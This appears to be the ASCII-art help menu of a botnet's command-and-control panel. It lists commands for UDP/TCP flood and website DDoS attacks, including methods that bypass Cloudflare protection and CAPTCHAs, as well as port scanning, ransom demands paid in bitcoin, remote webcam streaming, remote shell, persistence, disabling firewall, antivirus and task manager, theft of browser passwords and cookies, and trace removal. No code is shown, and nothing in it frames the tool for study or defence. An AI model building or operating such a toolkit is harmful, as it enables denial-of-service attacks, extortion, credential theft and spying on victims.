
                                          ╔═════════════════════════════════╗
                                          ║             COMMAND             ║
          ╔═══════════════════════════════╩═════════════════════════════════╩══════════════════════════════╗
          ║     attack <method> <ip> <port> <t> <thread>   ║     attack udp 127.0.0.1 80 60 100            ║
          ║     pscan <ip> <startport> <endport> <thread>  ║     pscan bot 127.0.0.1 1 100 100             ║
          ║     ddos <method> <url> <thread> <t>           ║     ddos cfb https://google.com 10 5          ║
          ║     ransom <price> <email> <btc>               ║     ransom $100 mail@mail.com BTC             ║
          ║     updatepayload <url>                        ║     Admin privileges required                 ║	  
          ║     webcam <ip> <port>                         ║     Stream webcam footage                     ║
          ║     shell <command>                            ║     Run shell commands                        ║
          ║     whois <ip>                                 ║     Get info on IP Address                    ║
          ║     kill                                       ║     Stop client from listening                ║
          ║     persistence                                ║     Set persistence                           ║
          ║     disablefirewall                            ║     Disable firewall                          ║
          ║     disableantivirus                           ║     Disable antivirus                         ║
          ║     disabletaskmanager                         ║     Disable taskmanager                       ║
          ║     datagrabber                                ║     Grab all brower user, pass, cookies       ║
          ║     selfdestruct                               ║     Remove all traces of the BotNet           ║
          ║     ping                                       ║     Ping all bots                             ║
          ║     sysinfo                                    ║     Grab system info                          ║
          ║     list                                       ║     List online bots                          ║
          ║     clear                                      ║     Clear console                             ║
          ║     update                                     ║     Update client list                        ║
          ║     admincheck                                 ║     Check admin privileges                    ║
          ║     exit or quit                               ║     Exit server and leave clients listening   ║
          ╚════════════════════════════════════════════════════════════════════════════════════════════════╝



	  
	  
	  
                                                ╔═════════════════════╗
                                                ║         I.P         ║
                          ╔═════════════════════╩═════════════════════╩════════════════════╗
                          ║                tcp             ║            UDP Attack         ║
                          ║                udp             ║            TCP Attack         ║
                          ╚════════════════════════════════════════════════════════════════╝
                          
                                                ╔═════════════════════╗
                                                ║       WEBSITE       ║
                          ╔═════════════════════╩═════════════════════╩════════════════════╗
                          ║    cfb             ║   Bypass CF Attack                        ║
                          ║    pxcfb           ║   Bypass CF Attack With Proxy             ║
                          ║    cfreq           ║   Bypass CF UAM, CAPTCHA, BFM (request)   ║
                          ║    cfsoc           ║   Bypass CF UAM, CAPTCHA, BFM (socket)    ║
                          ╚════════════════════════════════════════════════════════════════╝
		
